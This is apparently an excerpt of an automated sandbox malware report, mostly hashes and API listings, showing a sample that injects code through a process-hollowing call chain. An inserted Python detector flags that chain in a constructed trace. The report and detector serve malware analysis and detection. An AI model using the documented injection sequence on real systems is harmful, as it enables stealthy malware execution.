                                • Instruction ID: 51ef4d33472aed149f20d361aa6f1d1b8fe37e1627977af1e9aba4c68a2b6d89
                                • Opcode Fuzzy Hash: 4a611e80274c5684af272e12aeb3e5fd49b0f83b564aa7045bbb4411697730f5
                                • Instruction Fuzzy Hash: EB31E771B442058FCB04EFBA99543AEBEEAEFC6340F144869D44AC3396DE384D0687A1
                                Memory Dump Source
                                • Source File: 0000001A.00000002.2414233292.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_26_2_c40000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f720c1bc9254502e849d84e3b0d57b8ca1e0c2e9017820b5664b0e21f14ce15e
                                • Instruction ID: 8b0367f82e56ef6b81e2829c55e7e226edd21d6bdcf5a19a4aa64e92d0cffa17
                                • Opcode Fuzzy Hash: f720c1bc9254502e849d84e3b0d57b8ca1e0c2e9017820b5664b0e21f14ce15e
                                • Instruction Fuzzy Hash: A1319374A04305DFCF05EFB4E98069DBBB6FF85300F1049A9D045AB259DB34AA45CF51
                                Memory Dump Source
                                • Source File: 0000001A.00000002.2414233292.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_26_2_c40000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4927483f9ccd40dcc748c5046b5be182f1fd0932fbecfb2159f87ce9a7f67d35
                                • Instruction ID: 029c61702b2f6f7d37afad16aa6faccff6906a3329fcf027cd3015dd83b8de54
                                • Opcode Fuzzy Hash: 4927483f9ccd40dcc748c5046b5be182f1fd0932fbecfb2159f87ce9a7f67d35
                                • Instruction Fuzzy Hash: FB214F74904309DFCB05EFB4E984AADBBBAFF84300F104969D405AB359EB34AA85CB51
                                Memory Dump Source
                                • Source File: 0000001A.00000002.2414233292.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_26_2_c40000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cf91a9ab46c0dbaeed9da58d8f4201b27bba7cae653f3acb39a8f218a7db2aa4
                                • Instruction ID: 1f61110f38296987c44a59b2875e66998063a6e1f34ec8787292ea9b73eb005c
                                • Opcode Fuzzy Hash: cf91a9ab46c0dbaeed9da58d8f4201b27bba7cae653f3acb39a8f218a7db2aa4
                                • Instruction Fuzzy Hash: 2D113D3425D3459FCB06EF28F994A453BB9EB557007005AA4D0488F23ED774A98ACB80
                                Memory Dump Source
                                • Source File: 0000001A.00000002.2414233292.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_26_2_c40000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5896108214d393102e1cc53d32681f4cfb6ffba41005ab90513b404c018c2479
                                • Instruction ID: f1eb19c038ba3f1a6a148e857bd73873f44ec7738867d0f5ffde4dfe59f5827f
                                • Opcode Fuzzy Hash: 5896108214d393102e1cc53d32681f4cfb6ffba41005ab90513b404c018c2479
                                • Instruction Fuzzy Hash: C6110034D00109EFCF45EFA8EA8159EBBB9FF45304B108A69D519A7266DB306A46CF40
                                Memory Dump Source
                                • Source File: 0000001A.00000002.2414233292.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_26_2_c40000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 872fbb1240a7702ae07803fd8e8c48a94ac2a888dcb65aba6dbfdf39347c63ec
                                • Instruction ID: dfa601e8821460fa23792f3023bb309818471292032873e5c931cd144d4a928d
                                • Opcode Fuzzy Hash: 872fbb1240a7702ae07803fd8e8c48a94ac2a888dcb65aba6dbfdf39347c63ec
                                • Instruction Fuzzy Hash: 6901DB342583059FCB0AFF58F984E4577ADFB54744B009A6490488F23DD774A98ACF80

                                Execution Graph

                                Execution Coverage:10.1%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:181
                                Total number of Limit Nodes:9
                                execution_graph (rendered as an image; 181 nodes, edge list omitted). Call structure recoverable from the node list:
                                • 7aadb00 and 7aade00 -> 7aaf91a: dispatcher ("12 API calls") that reaches the ec80xxx wrappers below
                                • ec80107 -> 7aad778 / 7aad76c: CreateProcessA
                                • ec80521 -> 7aad429 / 7aad430: VirtualAllocEx
                                • ec803ed -> 7aad5d9 / 7aad5e0: ReadProcessMemory
                                • ec8049d, ec8066f, ec807a9, ec80833, ec80891, ec80911 -> 7aad4e9 / 7aad4f0: WriteProcessMemory
                                • ec80567, ec80858 -> 7aacf18 / 7aacf20: Wow64SetThreadContext (ec80567 continues to ResumeThread)
                                • ec802f3, ec80753, ec806d1 -> 7aace68 / 7aace70: ResumeThread
                                • ec80ff8 -> ec81278 / ec81270: PostMessageW
                                • 177d5e0: GetCurrentProcess, GetCurrentThread, GetCurrentProcess, GetCurrentThreadId
                                • 1774668 -> 1774778 -> 1774888 / 1774878 -> 1774560 -> 1775d18: CreateActCtxA
                                • 1774668 -> 1774204 -> 17759fc -> 1775a1c -> 1775a4c -> 1775a7c -> 177ae10 -> 177b250 -> 177b33a -> 177b580: GetModuleHandleW
                                • 1775a87 -> 1778b6b -> 177cf00 -> 177d4b9 / 177d4c8 -> 177d2f0: GetModuleHandleW
                                • 177d828: DuplicateHandle
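The execution graph above ties CreateProcessA, VirtualAllocEx, ReadProcessMemory, WriteProcessMemory, Wow64SetThreadContext and ResumeThread to one dispatcher (7aaf91a), which is the API sequence behind the report's "Creates a process in suspended mode" and "Injects a PE file into a foreign processes" signatures. The following Python detector is an added example, not part of the Joe Sandbox report or of the sample: it replays that chain over a constructed API trace and only fires when a suspended-created process receives a memory write, then a thread-context change, then a resume, on the same handles. The trace format, process and thread handles, sizes and the target image path are all assumptions made for this example.

```python
"""Process-hollowing detector over an API-call trace.

Added example, not part of the sandbox report. It replays the chain shown in
the execution graph (CreateProcessA -> VirtualAllocEx -> WriteProcessMemory ->
Wow64SetThreadContext -> ResumeThread) over a constructed trace. The line
format, handles, sizes and image path are assumptions for this example only.
"""
from dataclasses import dataclass

CREATE_SUSPENDED = 0x00000004            # dwCreationFlags bit of kernel32 CreateProcess*
WRITE_APIS = {"WriteProcessMemory", "NtWriteVirtualMemory"}
CONTEXT_APIS = {"SetThreadContext", "Wow64SetThreadContext", "NtSetContextThread"}
RESUME_APIS = {"ResumeThread", "NtResumeThread"}

# Constructed sample trace, one call per line: "<pid>\t<api>\t<key=value,...>".
# pid 7124 mirrors the chain from the graph; pid 5100 is a benign suspended-free launch.
SAMPLE_TRACE = """\
7124\tCreateProcessA\tcmdline=C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe,flags=0x4,hProcess=0x2a8,hThread=0x2ac
7124\tReadProcessMemory\thProcess=0x2a8,addr=0x7ffd0008,size=0x4
7124\tVirtualAllocEx\thProcess=0x2a8,addr=0x400000,size=0x1e000,protect=0x40
7124\tWriteProcessMemory\thProcess=0x2a8,addr=0x400000,size=0x200
7124\tWriteProcessMemory\thProcess=0x2a8,addr=0x401000,size=0x14000
7124\tWow64SetThreadContext\thThread=0x2ac
7124\tResumeThread\thThread=0x2ac
5100\tCreateProcessA\tcmdline=C:\\Windows\\System32\\notepad.exe,flags=0x0,hProcess=0x1f0,hThread=0x1f4
5100\tResumeThread\thThread=0x1f4
"""


@dataclass
class HollowCandidate:
    """A process created with CREATE_SUSPENDED, tracked until its thread is resumed."""
    pid: int
    image: str
    hprocess: str
    hthread: str
    allocated: bool = False
    bytes_written: int = 0
    context_set: bool = False
    resumed: bool = False

    def is_hollowing(self) -> bool:
        return self.bytes_written > 0 and self.context_set and self.resumed


def parse_line(line: str):
    """Split one trace line into (pid, api, {arg: value}); values stay as strings."""
    pid, api, rest = line.rstrip("\n").split("\t", 2)
    args = dict(kv.partition("=")[::2] for kv in rest.split(",") if kv)
    return int(pid), api, args


def detect_hollowing(trace: str) -> list:
    """Return candidates whose events form suspended-create -> write -> set-context
    -> resume, in that order, against the same target process and thread handles."""
    by_process, by_thread, findings = {}, {}, []
    for line in trace.splitlines():
        if not line.strip():
            continue
        pid, api, a = parse_line(line)
        if api in ("CreateProcessA", "CreateProcessW"):
            if int(a.get("flags", "0"), 16) & CREATE_SUSPENDED:
                c = HollowCandidate(pid, a.get("cmdline", "?"), a["hProcess"], a["hThread"])
                by_process[(pid, c.hprocess)] = c
                by_thread[(pid, c.hthread)] = c
            continue
        c = by_process.get((pid, a.get("hProcess"))) or by_thread.get((pid, a.get("hThread")))
        if c is None:
            continue                    # target was not created suspended by this caller
        if api == "VirtualAllocEx":
            c.allocated = True
        elif api in WRITE_APIS:
            c.bytes_written += int(a.get("size", "0"), 16)
        elif api in CONTEXT_APIS and c.bytes_written > 0:
            c.context_set = True        # only counts after an image was written in
        elif api in RESUME_APIS and c.context_set:
            c.resumed = True            # only counts after the entry point was redirected
            findings.append(c)
    return findings


if __name__ == "__main__":
    for hit in detect_hollowing(SAMPLE_TRACE):
        print(f"pid {hit.pid}: hollowed {hit.image} via hProcess={hit.hprocess}, "
              f"{hit.bytes_written:#x} bytes written, VirtualAllocEx={hit.allocated}")
```

The check is deliberately order-sensitive: a ResumeThread with no preceding write and context change, as the second constructed process shows, produces nothing, and a write that arrives only after the resume is not counted either. Handles are keyed per calling pid, so two processes reusing the same handle value do not get merged.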

                                Control-flow Graph

                                • Graph rendered as an image; legend: Executed / Not Executed (edge list omitted)
                                • Function 177d5d0-177d7ad; blocks with calls: 177d5d0-177d66f GetCurrentProcess, 177d678-177d6ac GetCurrentThread, 177d6b5-177d6e9 GetCurrentProcess, 177d6f2-177d70d call 177d7b1, 177d713-177d742 GetCurrentThreadId
                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 0177D65E
                                • GetCurrentThread.KERNEL32 ref: 0177D69B
                                • GetCurrentProcess.KERNEL32 ref: 0177D6D8
                                • GetCurrentThreadId.KERNEL32 ref: 0177D731
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2467568471.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_1770000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: 2706bb0aca7d54f2e4e96cdad595c26d45b59d5c89ac5bfc3f06338136cae8be
                                • Instruction ID: e1aa7bb928d4f272967d54ed64fdda50c3f013962ca99285ba9d74e4acd71e59
                                • Opcode Fuzzy Hash: 2706bb0aca7d54f2e4e96cdad595c26d45b59d5c89ac5bfc3f06338136cae8be
                                • Instruction Fuzzy Hash: 805165B09102498FDB14DFAAD548BEEBFF1EF49304F20C469D509A7260D7385984CB65

                                Control-flow Graph

                                • Graph rendered as an image; legend: Executed / Not Executed (edge list omitted)
                                • Function 177d5e0-177d7ad; blocks with calls: 177d5e0-177d66f GetCurrentProcess, 177d678-177d6ac GetCurrentThread, 177d6b5-177d6e9 GetCurrentProcess, 177d6f2-177d70d call 177d7b1, 177d713-177d742 GetCurrentThreadId
                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 0177D65E
                                • GetCurrentThread.KERNEL32 ref: 0177D69B
                                • GetCurrentProcess.KERNEL32 ref: 0177D6D8
                                • GetCurrentThreadId.KERNEL32 ref: 0177D731
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2467568471.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_1770000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: Current$ProcessThread
                                • String ID:
                                • API String ID: 2063062207-0
                                • Opcode ID: 81852f888330ee08a2e86f62a4a92818e2edb7f020bd27e52f67479c17a9b8aa
                                • Instruction ID: 2600cfe33f836496f77b8bbbb203e8cc9d171255cdba92cb27a5d9cc5aaeea7e
                                • Opcode Fuzzy Hash: 81852f888330ee08a2e86f62a4a92818e2edb7f020bd27e52f67479c17a9b8aa
                                • Instruction Fuzzy Hash: E85143B09112498FDB14DFAAD548BEEFBF1FF89304F20C069D509A7260D778A884CB65

                                Control-flow Graph

                                • Graph rendered as an image; legend: Executed / Not Executed (edge list omitted)
                                • Function 7aad76c-7aadabd; CreateProcessA in block 7aad907-7aad9c1; self-looping blocks 7aad82d-7aad83c, 7aad886-7aad895, 7aad8ee-7aad8fd before the call and 7aadabd after it
                                APIs
                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07AAD9AE
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2480246256.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7aa0000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 650c3406695245434f2b51eddde4f4e6570a75acecceba33e4864f8377dff2a6
                                • Instruction ID: fb288f506d11af461cf2284000bbdf60f54506f96702b8230dfe9111d82f62d8
                                • Opcode Fuzzy Hash: 650c3406695245434f2b51eddde4f4e6570a75acecceba33e4864f8377dff2a6
                                • Instruction Fuzzy Hash: B8917EB1E0021ADFDF24CF68C841BEDBBB2BF48314F148169D869A7644DB749985CF91

                                Control-flow Graph

                                • Graph rendered as an image; legend: Executed / Not Executed (edge list omitted)
                                • Function 7aad778-7aadabd; CreateProcessA in block 7aad907-7aad9c1; self-looping blocks 7aad82d-7aad83c, 7aad886-7aad895, 7aad8ee-7aad8fd before the call and 7aadabd after it
                                APIs
                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07AAD9AE
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2480246256.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7aa0000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 4b924592590cf3e13a8ae84eabb297567f437678a556044843024e93dc59423e
                                • Instruction ID: e6e3bd622ac9379e855857cf97f9331b560279e29f5716bc6253c02516b06c4c
                                • Opcode Fuzzy Hash: 4b924592590cf3e13a8ae84eabb297567f437678a556044843024e93dc59423e
                                • Instruction Fuzzy Hash: 9C916FB1E0021ADFDF24CF68C841BEDBBB2BF48314F148169D869A7644DB749985CF91

                                Control-flow Graph

                                • Graph rendered as an image; legend: Executed / Not Executed (edge list omitted)
                                • Function 177b33a-177b5c8; blocks with calls: 177b359-177b366 call 1779db8, 177b36e call 177b5e0 / 177b5d0, 177b400-177b407 call 177b000, 177b448-177b451 call 177b010, 177b46e-177b47e call 177b020 and 177b030, 177b580-177b5ab GetModuleHandleW
                                APIs
                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0177B59E
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2467568471.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_1770000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: HandleModule
                                • String ID:
                                • API String ID: 4139908857-0
                                • Opcode ID: a7d7399066878ba864ed400369935bc4477da882020798abc8724cccaf002f4a
                                • Instruction ID: 91cd35cbcee8a1aae043384df4aa156704b0db1ea422c0639f72502d8f02c650
                                • Opcode Fuzzy Hash: a7d7399066878ba864ed400369935bc4477da882020798abc8724cccaf002f4a
                                • Instruction Fuzzy Hash: A8814670A00B058FDB25DF29D45479ABBF1FF88300F048A6ED48ADBA54E734E949CB91

                                Control-flow Graph

                                • Graph rendered as an image; legend: Executed / Not Executed (edge list omitted)
                                • Function 1775d0c-1775e61; CreateActCtxA in block 1775d6e-1775dd9; self-looping block 1775e61
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 01775DC9
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2467568471.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_1770000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: b573b5d6a1213540eaefe65aff5eacf6837257550b4b02660cc48af158037eb5
                                • Instruction ID: 4e1f2fa620586b35d82a0b6166a6dd53c342a6d66b23f701b2d4e47da9fdcaa7
                                • Opcode Fuzzy Hash: b573b5d6a1213540eaefe65aff5eacf6837257550b4b02660cc48af158037eb5
                                • Instruction Fuzzy Hash: 7041F1B0C00619CEDF25DFA9C888BDEBBF1BF49304F2084AAD418AB255DB755946CF91

                                Control-flow Graph

                                • Graph rendered as an image; legend: Executed / Not Executed (edge list omitted)
                                • Function 1774560-1775e61; CreateActCtxA in block 1774560-1775dd9; self-looping block 1775e61
                                APIs
                                • CreateActCtxA.KERNEL32(?), ref: 01775DC9
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2467568471.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_1770000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: Create
                                • String ID:
                                • API String ID: 2289755597-0
                                • Opcode ID: b6b787fd62b2d313a9cb05ae1fc5619488d25a1e19eefe298d8003668e38e924
                                • Instruction ID: b8a43b71212ca484dd182c8518e5445b4e041689757f956ddcd08baa51b66d1a
                                • Opcode Fuzzy Hash: b6b787fd62b2d313a9cb05ae1fc5619488d25a1e19eefe298d8003668e38e924
                                • Instruction Fuzzy Hash: D841D2B0C00619CADB24DFA9C884B9DFBB5BF49304F20846AD418AB255DBB55946CF90

                                Control-flow Graph

                                • Graph rendered as an image; legend: Executed / Not Executed (edge list omitted)
                                • Function 7aad4e9-7aad5c6; WriteProcessMemory in block 7aad54e-7aad58d
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07AAD580
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2480246256.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7aa0000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: b0f3aac982104131c501952bcce075be23061b17dc5f8edc41df09c628d133ef
                                • Instruction ID: 306d32194984d962f1c9c5a7b060d67997e1d84f4051b23ab7b67dee7d45cdd2
                                • Opcode Fuzzy Hash: b0f3aac982104131c501952bcce075be23061b17dc5f8edc41df09c628d133ef
                                • Instruction Fuzzy Hash: 972128B59003099FCF10DFA9C945BEEBBF5FF48314F10842AE959A7250C7789554CBA0

                                Control-flow Graph

                                • Graph rendered as an image; legend: Executed / Not Executed (edge list omitted)
                                • Function 7aad4f0-7aad5c6; WriteProcessMemory in block 7aad54e-7aad58d
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07AAD580
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2480246256.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7aa0000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: cc729e92ed03c5882779a3979f1d4eb9805af4033deefca6d793d6fa8b313656
                                • Instruction ID: ac843fea1aba8371b6f218592182994761b169b2135fa25634e56395e15b758b
                                • Opcode Fuzzy Hash: cc729e92ed03c5882779a3979f1d4eb9805af4033deefca6d793d6fa8b313656
                                • Instruction Fuzzy Hash: 80213BB59003099FCF10DFA9C845BEEBBF5FF48314F108429E959A7240C7789544CBA0

                                Control-flow Graph

                                • Graph rendered as an image; legend: Executed / Not Executed (edge list omitted)
                                • Function 7aacf18-7aacfe4; Wow64SetThreadContext in block 7aacf7b-7aacfab
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07AACF9E
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2480246256.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7aa0000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 67145a33c1cfe44e3b87f30a2444ab31e3531b7eb2895bec50f88f92514ff1e6
                                • Instruction ID: 0043b0959edf5a14d3f571b3d4ef7d54bfd1a35e3ce496907ff8632c2364bbaf
                                • Opcode Fuzzy Hash: 67145a33c1cfe44e3b87f30a2444ab31e3531b7eb2895bec50f88f92514ff1e6
                                • Instruction Fuzzy Hash: D52128B19003099FDB10DFAAC4857EEBBF4EF89324F14842AD569A7240CB789945CFA1
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07AAD660
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2480246256.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7aa0000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: 1f0505c034125a7a72319b066ee39b93b28bf50276643b02cb560b7e86acfbb9
                                • Instruction ID: ca1f2ca859f3c52097df21fe2ba9a7bc89243c3302c762a85da98146748ab051
                                • Opcode Fuzzy Hash: 1f0505c034125a7a72319b066ee39b93b28bf50276643b02cb560b7e86acfbb9
                                • Instruction Fuzzy Hash: 0B2125B1D002599FCB10DFAAC884AEEFBF5FF48310F10842AE569A7250C7789540DBA1
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0177D8AF
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2467568471.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_1770000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 618e85a6f55b3d570c75545318dda9b62293e7d1d6c1a4334e325700e8082628
                                • Instruction ID: 297d94caaf0d7ddf5e661b9408e231bc6ac883284b5def19bee611feff47fec8
                                • Opcode Fuzzy Hash: 618e85a6f55b3d570c75545318dda9b62293e7d1d6c1a4334e325700e8082628
                                • Instruction Fuzzy Hash: 9F21D2B5900248DFDF10CFA9D584AEEBFF5FB48310F14845AE918A7250C378AA44CFA0
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07AAD660
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2480246256.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7aa0000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: 570ced3c2c6c087d23e69c9c8ef830e88285fa77425c726df53f637d38e4d2a8
                                • Instruction ID: 650dc861ea5bec50a7b4a7f3e2840031ea7b142de10cc45aba2282c6f541f333
                                • Opcode Fuzzy Hash: 570ced3c2c6c087d23e69c9c8ef830e88285fa77425c726df53f637d38e4d2a8
                                • Instruction Fuzzy Hash: 5C2107B1D003599FCB10DFAAC885AEEFBF5FF48310F50842AE959A7250C7789944CBA5
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07AACF9E
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2480246256.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7aa0000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 40e5347ef572dc4b27a3769d4e53b8208cbeb6268bf00ed9d32fc3768f001257
                                • Instruction ID: a56d76f2965315447a144fb299f06c8f3740c72800d020988552a6b0508990bd
                                • Opcode Fuzzy Hash: 40e5347ef572dc4b27a3769d4e53b8208cbeb6268bf00ed9d32fc3768f001257
                                • Instruction Fuzzy Hash: D02115B19003099FDB10DFAAC5857EEFBF4EF89324F54842AD519A7240CB78A945CFA1
                                APIs
                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0177D8AF
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2467568471.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_1770000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: DuplicateHandle
                                • String ID:
                                • API String ID: 3793708945-0
                                • Opcode ID: 066ed2c3c79e075fccb174775d709b96e54b5c746467f32a6e5fca2221ffa927
                                • Instruction ID: 9cc02b88fa56bb89c6fcc95fe198431a519689dafb01703ce4eb02732af4bc21
                                • Opcode Fuzzy Hash: 066ed2c3c79e075fccb174775d709b96e54b5c746467f32a6e5fca2221ffa927
                                • Instruction Fuzzy Hash: 2A21B3B59002489FDB10CF9AD584ADEFBF9FB48310F14845AE918A7350D378A944CFA5
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07AAD49E
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2480246256.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7aa0000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: a54e76b0ec62c8dd84e09481bff133cf3819a243c34ed49d4a69d81dc842ae6e
                                • Instruction ID: 04333922d467525e6f9dec0791e22d70a22faa5628342e140ed70fe808c06876
                                • Opcode Fuzzy Hash: a54e76b0ec62c8dd84e09481bff133cf3819a243c34ed49d4a69d81dc842ae6e
                                • Instruction Fuzzy Hash: C01159B59002099FCB10DFA9C944AEFBFF5EF88314F208419E519A7250C779A540CFA0
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07AAD49E
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2480246256.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7aa0000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 6cbb641d92b7e33ef0028c5220dce00400e4163c17de83e9df84af29e3da71c9
                                • Instruction ID: ce111ab4f2cc0202edfc4651715ab9c41c315202a5d894971c149561294f2a90
                                • Opcode Fuzzy Hash: 6cbb641d92b7e33ef0028c5220dce00400e4163c17de83e9df84af29e3da71c9
                                • Instruction Fuzzy Hash: FF1137B59002499FCB10DFAAC844AEFBFF5FF88324F208419E519A7250C779A940CFA0
                                APIs
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2480246256.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7aa0000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: f16b8f65f83d98b887f3b92847293fa20a9825116863fa4bd0b7555cba84f2a4
                                • Instruction ID: 45753dc4b9896e212a150721e352529c6ed45803c0f348a2bdd2d32cf41a0ca1
                                • Opcode Fuzzy Hash: f16b8f65f83d98b887f3b92847293fa20a9825116863fa4bd0b7555cba84f2a4
                                • Instruction Fuzzy Hash: DA1149B19002498FDB20DFA9C4457EEFBF5AF99324F20841AD519A7240CB79A540CBA0
                                APIs
                                Memory Dump Source
                                • Source File: 0000001B.00000002.2480246256.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_27_2_7aa0000_SS Bottmac Engineers Pvt.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
